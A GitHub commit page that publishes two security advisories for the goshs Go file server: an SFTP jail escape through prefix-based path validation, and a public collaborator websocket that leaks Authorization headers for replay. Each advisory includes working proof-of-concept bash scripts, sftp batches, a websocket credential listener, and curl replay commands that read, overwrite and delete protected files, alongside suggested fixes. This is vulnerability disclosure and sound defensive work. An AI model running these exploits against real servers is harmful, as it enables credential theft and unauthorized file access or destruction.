Skip to content

Commit 7f7901f

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-5h6h-7rc9-3824 GHSA-7h3j-592v-jcrp GHSA-c29w-qq4m-2gcv GHSA-jrq5-hg6x-j6g3 GHSA-rg7c-g689-fr3x
1 parent 22b00af commit 7f7901f

File tree

5 files changed

+317
-5
lines changed

5 files changed

+317
-5
lines changed

advisories/github-reviewed/2026/04/GHSA-5h6h-7rc9-3824/GHSA-5h6h-7rc9-3824.json

Lines changed: 78 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,78 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-5h6h-7rc9-3824",
4+
"modified": "2026-04-14T22:28:17Z",
5+
"published": "2026-04-14T22:28:17Z",
6+
"aliases": [],
7+
"summary": "SFTP root escape via prefix-based path validation in goshs",
8+
"details": "### Summary\ngoshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files.\n\n### Details\nThe SFTP subsystem routes requests through `sftpserver/sftpserver.go:99-126` into `DefaultHandler.GetHandler()` in `sftpserver/handler.go:90-112`, which forwards file operations into `readFile`, `writeFile`, `listFile`, and `cmdFile`. All of those sinks rely on `sanitizePath()` in `sftpserver/helper.go:47-59`. The vulnerable logic is:\n\n```go\ncleanPath = filepath.Clean(\"/\" + clientPath)\nif !strings.HasPrefix(cleanPath, sftpRoot) {\n return \"\", errors.New(\"access denied: outside of webroot\")\n}\n```\n\nThis is a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is `/tmp/goshsroot`, then a sibling path such as `/tmp/goshsroot_evil/secret.txt` incorrectly passes validation since it starts with the same byte prefix.\n\nThat unsafe value then reaches filesystem sinks including:\n\n- `os.Open` in `sftpserver/helper.go:80-94`\n- `os.Create` in `sftpserver/helper.go:139-152`\n- `os.Rename` in `sftpserver/helper.go:214-221`\n- `os.RemoveAll` in `sftpserver/helper.go:231-232`\n- `os.Mkdir` in `sftpserver/helper.go:242-243`\n\nThis means an authenticated SFTP user can escape the configured jail and read, create, upload, rename, or delete content outside the intended root directory.\n\n### PoC\nThe configured SFTP root was `/tmp/goshsroot`, but the SFTP client was still able to access `/tmp/goshsroot_evil/secret.txt` and create `/tmp/goshsroot_owned/pwned.txt`, both of which are outside the configured root.\n\nManual verification commands used:\n\n`Terminal 1`\n\n```bash\ncd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4'\ngo build -o /tmp/goshs_beta4 ./\n\nrm -rf /tmp/goshsroot /tmp/goshsroot_evil /tmp/goshsroot_owned /tmp/outside_sftp.txt /tmp/local_upload.txt /tmp/goshs_beta4_client_key\nmkdir -p /tmp/goshsroot /tmp/goshsroot_evil\nprintf 'outside secret\\n' > /tmp/goshsroot_evil/secret.txt\nprintf 'proof via sftp write\\n' > /tmp/local_upload.txt\ncp sftpserver/goshs_client_key /tmp/goshs_beta4_client_key\nchmod 600 /tmp/goshs_beta4_client_key\n\n/tmp/goshs_beta4 -sftp -d /tmp/goshsroot --sftp-port 2222 \\\n --sftp-keyfile sftpserver/authorized_keys \\\n --sftp-host-keyfile sftpserver/goshs_host_key_rsa\n```\n\n`Terminal 2`\n\n```bash\nprintf 'ls /tmp/goshsroot_evil\\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\\nmkdir /tmp/goshsroot_owned\\nbye\\n' | \\\nsftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\nprintf 'put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\\nbye\\n' | \\\nsftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\ncat /tmp/outside_sftp.txt\ncat /tmp/goshsroot_owned/pwned.txt\n```\n\nExpected result:\n\n- `ls /tmp/goshsroot_evil` succeeds even though that path is outside `/tmp/goshsroot`\n- `cat /tmp/outside_sftp.txt` prints `outside secret`\n- `cat /tmp/goshsroot_owned/pwned.txt` prints `proof via sftp write`\n\nPoC Video 1:\n\nhttps://github.com/user-attachments/assets/d2c96301-afc8-4ddc-b008-74b235f94e31\n\n\n\nSingle-script verification:\n\n```bash\n'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc1'\n```\n\n`gosh_poc1` script content:\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nREPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4'\nBIN='/tmp/goshs_beta4_sftp_escape'\nROOT='/tmp/goshsroot'\nOUTSIDE='/tmp/goshsroot_evil'\nOWNED='/tmp/goshsroot_owned'\nCLIENT_KEY='/tmp/goshs_beta4_client_key'\nDOWNLOAD='/tmp/outside_sftp.txt'\nUPLOAD_SRC='/tmp/local_upload.txt'\nPORT='2222'\nSERVER_PID=\"\"\n\ncleanup() {\n if [[ -n \"${SERVER_PID:-}\" ]]; then\n kill \"${SERVER_PID}\" >/dev/null 2>&1 || true\n wait \"${SERVER_PID}\" 2>/dev/null || true\n fi\n}\ntrap cleanup EXIT\n\necho '[1/6] Building goshs beta.4'\ncd \"${REPO}\"\ngo build -o \"${BIN}\" ./\n\necho '[2/6] Preparing root and sibling paths'\nrm -rf \"${ROOT}\" \"${OUTSIDE}\" \"${OWNED}\" \"${DOWNLOAD}\" \"${UPLOAD_SRC}\" \"${CLIENT_KEY}\"\nmkdir -p \"${ROOT}\" \"${OUTSIDE}\"\nprintf 'outside secret\\n' > \"${OUTSIDE}/secret.txt\"\nprintf 'proof via sftp write\\n' > \"${UPLOAD_SRC}\"\ncp \"${REPO}/sftpserver/goshs_client_key\" \"${CLIENT_KEY}\"\nchmod 600 \"${CLIENT_KEY}\"\n\necho '[3/6] Starting SFTP server'\n\"${BIN}\" -sftp -d \"${ROOT}\" --sftp-port \"${PORT}\" \\\n --sftp-keyfile \"${REPO}/sftpserver/authorized_keys\" \\\n --sftp-host-keyfile \"${REPO}/sftpserver/goshs_host_key_rsa\" \\\n >/tmp/gosh_poc1.log 2>&1 &\nSERVER_PID=$!\n\nfor _ in $(seq 1 20); do\n if python3 - <<PY\nimport socket\ns = socket.socket()\ntry:\n s.connect((\"127.0.0.1\", ${PORT}))\n raise SystemExit(0)\nexcept OSError:\n raise SystemExit(1)\nfinally:\n s.close()\nPY\n then\n break\n fi\n sleep 1\ndone\n\necho '[4/6] Listing and downloading path outside configured root'\nprintf 'ls /tmp/goshsroot_evil\\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\\nmkdir /tmp/goshsroot_owned\\nbye\\n' | \\\n sftp -i \"${CLIENT_KEY}\" -P \"${PORT}\" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\necho '[5/6] Writing a new file outside configured root'\nprintf 'put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\\nbye\\n' | \\\n sftp -i \"${CLIENT_KEY}\" -P \"${PORT}\" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - foo@127.0.0.1\n\necho '[6/6] Verifying outside-root read and write'\necho \"Downloaded content: $(cat \"${DOWNLOAD}\")\"\necho \"Written content: $(cat \"${OWNED}/pwned.txt\")\"\n\nif [[ \"$(cat \"${DOWNLOAD}\")\" == 'outside secret' ]] && [[ \"$(cat \"${OWNED}/pwned.txt\")\" == 'proof via sftp write' ]]; then\n echo '[RESULT] VULNERABLE: authenticated SFTP user escaped the configured root'\nelse\n echo '[RESULT] NOT REPRODUCED'\n exit 1\nfi\n```\n\nPoC Video 2:\n\nhttps://github.com/user-attachments/assets/25e7a4d7-6ec7-40a6-b3d4-d66df3ea3e5f\n\n\n\n### Impact\nThis is a path traversal / jail escape in the SFTP service. Any authenticated SFTP user can break out of the configured root and access sibling filesystem paths that were never meant to be exposed through goshs. In practice this can lead to unauthorized file disclosure, arbitrary file upload outside the shared root, unwanted directory creation, overwrite of sensitive files, or data deletion depending on the reachable path and server permissions.\n\n### Remediation\nSuggested fixes:\n\n1. Replace the raw prefix check with a real directory-boundary validation such as requiring either exact root equality or `root + path separator` as the prefix.\n2. Reuse the hardened HTTP-style path sanitizer across SFTP as well, so all file-serving modes share the same boundary logic.\n3. Add regression tests for sibling-prefix cases like `/tmp/goshsroot_evil`, not only `..` traversal payloads.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/patrickhener/goshs"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"last_affected": "1.1.4"
30+
}
31+
]
32+
}
33+
]
34+
},
35+
{
36+
"package": {
37+
"ecosystem": "Go",
38+
"name": "github.com/patrickhener/goshs/v2"
39+
},
40+
"ranges": [
41+
{
42+
"type": "ECOSYSTEM",
43+
"events": [
44+
{
45+
"introduced": "0"
46+
},
47+
{
48+
"fixed": "2.0.0"
49+
}
50+
]
51+
}
52+
]
53+
}
54+
],
55+
"references": [
56+
{
57+
"type": "WEB",
58+
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-5h6h-7rc9-3824"
59+
},
60+
{
61+
"type": "PACKAGE",
62+
"url": "https://github.com/patrickhener/goshs"
63+
},
64+
{
65+
"type": "WEB",
66+
"url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0"
67+
}
68+
],
69+
"database_specific": {
70+
"cwe_ids": [
71+
"CWE-22"
72+
],
73+
"severity": "HIGH",
74+
"github_reviewed": true,
75+
"github_reviewed_at": "2026-04-14T22:28:17Z",
76+
"nvd_published_at": null
77+
}
78+
}

advisories/github-reviewed/2026/04/GHSA-7h3j-592v-jcrp/GHSA-7h3j-592v-jcrp.json

Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-7h3j-592v-jcrp",
4+
"modified": "2026-04-14T22:28:54Z",
5+
"published": "2026-04-14T22:28:54Z",
6+
"aliases": [],
7+
"summary": "goshs's public collaborator feed leaks .goshs ACL credentials and enables unauthorized access",
8+
"details": "### Summary\ngoshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to `.goshs`-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including `Authorization`. An unauthenticated observer can capture a victim's folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. I reproduced this on `v2.0.0-beta.5`, the latest supported release as of April 10, 2026.\n\n### Details\nThe main web UI and collaborator websocket stay public when goshs is started without global `-b user:pass` authentication:\n\n- `httpserver/server.go:72-85` only installs `BasicAuthMiddleware()` when a global username or password is configured\n\nThe vulnerable request is logged before `.goshs` authorization is enforced:\n\n- `httpserver/handler.go:277-279` calls `emitCollabEvent()` and `logger.LogRequest()` before the protected file is passed into ACL enforcement\n- `httpserver/handler.go:291-309` performs folder-level `.goshs` authentication later in `applyCustomAuth()`\n\nThe collaborator pipeline copies and broadcasts every request header:\n\n- `httpserver/collaborator.go:22-46` flattens all request headers, including `Authorization`, into the websocket event and sends them to the hub\n- `ws/hub.go:77-84` fans the event out live to all connected websocket clients\n- `ws/hub.go:116-122` replays up to 200 prior HTTP events to newly connected websocket clients via catchup\n\nThe frontend also makes the leak easier to understand by decoding authorization values:\n\n- `assets/js/main.js:627-645` formats and decodes the `Authorization` header for display in the collaborator panel\n\nIn practice, a victim request such as:\n\n```http\nGET /ACLAuth/secret.txt\nAuthorization: Basic YWRtaW46YWRtaW4=\n```\n\nis visible to any public websocket observer before the protected file's ACL check is enforced. The attacker can then replay the leaked header against the same protected folder and gain the victim's effective access.\n\n### PoC\nManual verification commands used:\n\n`Terminal 1`\n\n```bash\ncd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'\ngo build -o /tmp/goshs_beta5 ./\n\nrm -rf /tmp/goshs_collab_root\nmkdir -p /tmp/goshs_collab_root/ACLAuth\ncp integration/keepFiles/goshsACLAuth /tmp/goshs_collab_root/ACLAuth/.goshs\nprintf 'very secret\\n' > /tmp/goshs_collab_root/ACLAuth/secret.txt\n\n/tmp/goshs_beta5 -d /tmp/goshs_collab_root -p 18096\n```\n\n`Terminal 2`\n\n```bash\nnode - <<'NODE'\nconst ws = new WebSocket('ws://127.0.0.1:18096/?ws');\nws.onmessage = (ev) => console.log(ev.data.toString());\nNODE\n```\n\n`Terminal 3`\n\n```bash\ncurl -s -o /dev/null -w '%{http_code}\\n' http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -u admin:admin http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -o /dev/null -w '%{http_code}\\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -X PUT --data-binary 'owned' http://127.0.0.1:18096/ACLAuth/pwn.txt\ncurl -s -o /dev/null -w '%{http_code}\\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' 'http://127.0.0.1:18096/ACLAuth/secret.txt?delete'\n```\n\nTwo terminal commands I ran during local validation:\n\n```bash\ncurl -s -o /dev/null -w '%{http_code}\\n' http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt\n```\n\nObserved results from manual verification:\n\n- the anonymous request returned `401`\n- the victim request returned `very secret`\n- the replayed leaked header also returned `very secret`\n- the replayed `PUT` returned `200`\n- the replayed `?delete` returned `200`\n- the public websocket showed `Authorization\":\"Basic YWRtaW46YWRtaW4=\"`\n\nPoC Video 1:\n\nhttps://github.com/user-attachments/assets/1347838e-28a0-4c9f-be9f-db7e2938c752\n\n\n\nSingle-script verification:\n\n```bash\n'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc4'\n```\n\nObserved script result:\n\n- `Captured header: Basic YWRtaW46YWRtaW4=`\n- `Anonymous GET status: 401`\n- `Replayed-header GET body: very secret`\n- `Replayed-header PUT status: 200`\n- `Replayed-header delete status: 200`\n- `[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree`\n\nPoC Video 2:\n\nhttps://github.com/user-attachments/assets/b25648a9-b96c-46b3-9ee4-0ae4cc1c3472\n\n\n\n`gosh_poc4` script content:\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nREPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'\nFIXTURE='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5/integration/keepFiles/goshsACLAuth'\nBIN='/tmp/goshs_beta5_collab_leak'\nPORT='18096'\nWORKDIR=\"$(mktemp -d /tmp/goshs-collab-beta5-XXXXXX)\"\nROOT=\"$WORKDIR/root\"\nWS_LOG=\"$WORKDIR/ws.log\"\nGOSHS_PID=\"\"\nWATCH_PID=\"\"\n\ncleanup() {\n if [[ -n \"${WATCH_PID:-}\" ]]; then\n kill \"${WATCH_PID}\" >/dev/null 2>&1 || true\n wait \"${WATCH_PID}\" 2>/dev/null || true\n fi\n if [[ -n \"${GOSHS_PID:-}\" ]]; then\n kill \"${GOSHS_PID}\" >/dev/null 2>&1 || true\n wait \"${GOSHS_PID}\" 2>/dev/null || true\n fi\n}\ntrap cleanup EXIT\n\nmkdir -p \"${ROOT}/ACLAuth\"\ncp \"${FIXTURE}\" \"${ROOT}/ACLAuth/.goshs\"\nprintf 'very secret\\n' > \"${ROOT}/ACLAuth/secret.txt\"\n\necho \"[1/6] Building goshs beta.5\"\n(cd \"${REPO}\" && go build -o \"${BIN}\" ./)\n\necho \"[2/6] Starting goshs without global auth on 127.0.0.1:${PORT}\"\n\"${BIN}\" -d \"${ROOT}\" -p \"${PORT}\" >\"${WORKDIR}/goshs.log\" 2>&1 &\nGOSHS_PID=$!\n\nfor _ in $(seq 1 40); do\n if curl -s \"http://127.0.0.1:${PORT}/\" >/dev/null 2>&1; then\n break\n fi\n sleep 0.25\ndone\n\necho \"[3/6] Opening an unauthenticated websocket observer\"\nnode - <<'NODE' >\"${WS_LOG}\" &\nconst ws = new WebSocket('ws://127.0.0.1:18096/?ws');\nws.onopen = () => console.log('OPEN');\nws.onmessage = (ev) => {\n const msg = ev.data.toString();\n console.log(msg);\n if (msg.includes('Authorization')) process.exit(0);\n};\nsetTimeout(() => process.exit(0), 10000);\nNODE\nWATCH_PID=$!\n\necho \"[4/6] Simulating a victim request with folder credentials\"\ncurl -s -u admin:admin \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt\" >/dev/null\nwait \"${WATCH_PID}\" || true\nWATCH_PID=\"\"\n\nLEAKED_HEADER=\"$(python3 - \"${WS_LOG}\" <<'PY'\nimport pathlib\nimport re\nimport sys\n\ntext = pathlib.Path(sys.argv[1]).read_text()\nm = re.search(r'Basic [A-Za-z0-9+/=]+', text)\nprint(m.group(0) if m else '')\nPY\n)\"\n\nif [[ -z \"${LEAKED_HEADER}\" ]]; then\n echo \"[ERROR] No leaked Authorization header was captured.\" >&2\n echo \"[DEBUG] Websocket output:\" >&2\n cat \"${WS_LOG}\" >&2\n exit 1\nfi\n\necho \"[5/6] Replaying the leaked header as the attacker\"\nUNAUTH_CODE=\"$(curl -s -o /dev/null -w '%{http_code}' \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt\")\"\nREAD_BACK=\"$(curl -s -H \"Authorization: ${LEAKED_HEADER}\" \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt\")\"\nPUT_CODE=\"$(curl -s -o /dev/null -w '%{http_code}' -H \"Authorization: ${LEAKED_HEADER}\" -X PUT --data-binary 'owned' \"http://127.0.0.1:${PORT}/ACLAuth/pwn.txt\")\"\nDELETE_CODE=\"$(curl -s -o /dev/null -w '%{http_code}' -H \"Authorization: ${LEAKED_HEADER}\" \"http://127.0.0.1:${PORT}/ACLAuth/secret.txt?delete\")\"\n\nif [[ \"${UNAUTH_CODE}\" != \"401\" ]]; then\n echo \"[ERROR] Expected anonymous direct access to fail with 401, got ${UNAUTH_CODE}.\" >&2\n exit 1\nfi\n\nif [[ \"${READ_BACK}\" != \"very secret\" ]]; then\n echo \"[ERROR] Replayed header did not unlock the protected file.\" >&2\n exit 1\nfi\n\nif [[ \"${PUT_CODE}\" != \"200\" ]]; then\n echo \"[ERROR] Expected replayed-header PUT to return 200, got ${PUT_CODE}.\" >&2\n exit 1\nfi\n\nif [[ \"${DELETE_CODE}\" != \"200\" ]]; then\n echo \"[ERROR] Expected replayed-header delete to return 200, got ${DELETE_CODE}.\" >&2\n exit 1\nfi\n\nif [[ ! -f \"${ROOT}/ACLAuth/pwn.txt\" ]]; then\n echo \"[ERROR] PUT did not create pwn.txt.\" >&2\n exit 1\nfi\n\nif [[ -f \"${ROOT}/ACLAuth/secret.txt\" ]]; then\n echo \"[ERROR] Delete did not remove secret.txt.\" >&2\n exit 1\nfi\n\necho \"[6/6] Results\"\necho \"Captured header: ${LEAKED_HEADER}\"\necho \"Anonymous GET status: ${UNAUTH_CODE}\"\necho \"Replayed-header GET body: ${READ_BACK}\"\necho \"Replayed-header PUT status: ${PUT_CODE}\"\necho \"Replayed-header delete status: ${DELETE_CODE}\"\necho \"[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree\"\n```\n\n### Impact\nThis issue is a sensitive information disclosure that becomes an authentication bypass against `.goshs`-protected content. Any unauthenticated observer who can access the public collaborator websocket can steal folder-level basic-auth credentials from a victim request and immediately reuse them to read, upload, overwrite, or delete files inside the protected subtree. Deployments that rely on public goshs access with selective `.goshs`-protected subfolders are directly exposed.\n\n### Remediation\nSuggested fixes:\n\n1. Never store or broadcast sensitive headers such as `Authorization`, `Cookie`, or `Proxy-Authorization` in collaborator events.\n2. Move collaborator logging until after access-control checks, and log only minimal metadata instead of raw headers and bodies.\n3. Protect the collaborator websocket and panel with the same or stronger authentication boundary as the resources being observed.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/patrickhener/goshs/v2"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "2.0.0-beta.4"
27+
},
28+
{
29+
"fixed": "2.0.0-beta.6"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 2.0.0-beta.5"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp"
43+
},
44+
{
45+
"type": "PACKAGE",
46+
"url": "https://github.com/patrickhener/goshs"
47+
}
48+
],
49+
"database_specific": {
50+
"cwe_ids": [
51+
"CWE-200"
52+
],
53+
"severity": "HIGH",
54+
"github_reviewed": true,
55+
"github_reviewed_at": "2026-04-14T22:28:54Z",
56+
"nvd_published_at": null
57+
}
58+
}

0 commit comments

Comments
 (0)